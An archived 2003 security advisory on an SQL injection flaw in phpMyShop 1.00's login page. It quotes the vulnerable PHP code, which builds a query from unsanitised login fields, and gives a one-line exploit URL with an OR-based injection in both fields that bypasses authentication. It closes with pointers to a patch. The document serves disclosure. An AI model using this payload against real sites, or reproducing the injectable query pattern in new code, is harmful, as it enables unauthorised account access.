3rd Feb 2003 [SBWID-5963]
COMMAND
phpMyShop SQL Injection
SYSTEMS AFFECTED
phpMyShop 1.00
PROBLEM
Frog Man [[email protected]] found :
PHP Code/Location :
°°°°°°°°°°°°°°°°°°?
compte.php :
---------------------------------------------------------------
<?
session_start();
if (isset($achat))
{
session_register("achat");
}
else
{
header("location:index.php");
}
include("design/header.php");
require("config.php");
require("fonction.php");
echo"<td bgcolor=\"$barre1\"><strong>Identification</strong></td>
</tr>
<tr>
<td><br>";
if (isset($valider)) { $sql = "SELECT id_cli,login_cli,pass_cli FROM
$table_client where login_cli='$identifiant' and pass_cli='$password'";
$sql = mysql_db_query($base,$sql); $test = mysql_num_rows($sql); if
($test=="0") { ?> <script language="javascript"> alert("Identifiant
ou mot de passe non valide!"); </script> <?
echo"<center><strong>Identifiant ou mot de passe non
valide!</strong></center><br>"; } else { $id_membre =
mysql_result($sql,0,"id_cli"); session_register("id_membre"); ?>
<script language="javascript"> document.location.href="valide.php"
</script> <? } }
[...] ---------------------------------------------------------------
Exploit :
°°°°°°°°?
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
SOLUTION
Check, http://www.pc-encheres.com
-Also-
A patch has been published on http://www.phpsecure.info .
More details :
°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/phpmyshop.txt